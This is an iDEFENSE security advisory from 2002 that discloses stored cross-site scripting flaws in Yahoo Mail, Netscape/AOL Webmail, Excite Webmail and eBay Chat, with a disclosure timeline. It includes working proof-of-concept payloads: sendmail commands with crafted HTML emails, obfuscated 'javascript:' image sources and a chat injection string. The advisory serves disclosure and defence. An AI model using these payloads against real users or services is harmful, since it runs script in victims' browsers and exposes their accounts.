Public Vulnerability Reports

Cross-Site Scripting Vulnerabilities in Popular Web Applications

08.19.02

BACKGROUND

Many web applications generate dynamic HTML web pages using user-submitted data and other sources of "untrusted content." web applications not meticulously filtering this untrusted content before presenting the web page to the user may allow for the manipulation of the web page and its content interpretation by a web browser. This
issue becomes dangerous when untrusted content is able to be inserted into a dynamic HTML web page via a web application or other means, causing the content to execute potentially malicious code within a users browser with the exact same privileges of the legitimate web server.

DESCRIPTION

Some web applications such as Yahoo Mail and others, already meticulously filter incoming untrusted data before the content reaches their users. However, given the loose interpretation of HTML/JavaScript/VBScript etc. by various web browsers, obfuscated
content may elude the current filters and execute within the users browser environment, thereby allowing an attacker to target users almost instantly without relying on the user performing any activities other than normal usage. All vulnerabilities affect web browsers create by Microsoft Corp. or Netscape Communication Corp. These types of XSS vulnerabilities are usually classified as "constant-state", as they exist persistently for more than just one HTTP request. More detailed XSS exploitation scenarios are detailed in an iDEFENSE paper available at http://www.idefense.com/XSS.html.

ANALYSIS

Yahoo! Mail

The following XSS vulnerability only existed for Netscape 4.x browsers (see Vendor Response, this issue in Yahoo has since been addressed):

bash$ sendmail -t target@yahoo.com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<ILAYER SRC="script.js"></ILAYER>


</BODY></HTML>
.
--------------------------------------------------

Netscape/AOL Webmail

This XSS vulnerability exists in Netscape Mail (webmail.netscape.com) and AOL Webmail (webmail.aol.com).  The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x:

bash$ sendmail -t target@netscape.net

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<IMG SRC="javasc&#X0A;ript:alert('test');">

</BODY></HTML>
.
--------------------------------------------------

Excite Webmail

It would seem that Excite does not perform any filtering of HTML/SCRIPT whatsoever. The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x/6.x:

bash$ sendmail -t target@excite.com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<SCRIPT>alert(document.domain);</SCRIPT>

</BODY></HTML>
.
--------------------------------------------------

eBay Chat

While you are logged in as an eBay user, place the text sting below within the chat text field and click submit. The message will appear within the main chat text message and will execute in a user's browser when read. The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x:

---- XSS String ------------------------------------
<IMG SRC="javasc&#X0A;ript:alert(document.domain);">
----------------------------------------------------

DETECTION

The following are affected:

Yahoo! Mail http://mail.yahoo.com
Netscape Mail http://webmail.netscape.com
AOL Webmail http://webmail.aol.com (same as Netscape Mail)
Excite Mail http://mail.excite.com
eBay Chat http://pages.ebay.com/community/chat/index.html

WORKAROUND

No workaround is available as of this writing.

VENDOR RESPONSE

On July 16, 2002, Scott Renfro (scottr@yahoo-inc.com), who goes by the title "Paranoid Yahoo," said that the issue was fixed in Yahoo! Mail.

CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project did not assign identification numbers to these issues.

DISCLOSURE TIMELINE

06/27/2002 Issue disclosed to iDEFENSE
07/16/2002 Ebay, AOL/Netscape, Yahoo, and Excite notified
07/16/2002 iDEFENSE clients notified
08/11/2002  Second notice given to Excite, AOL/Netscape, and eBay through web customer service suggestion systems
08/19/2002 Still no response from Excite, AOL/Netscape, or eBay
08/19/2002 iDEFENSE released public advisory

CREDIT

Jeremiah Grossman (jeremiah@whitehatsec.com) and Lex Arquette(lex@whitehatsec.com) of WhiteHat Security Inc. are credited with discovering these bugs.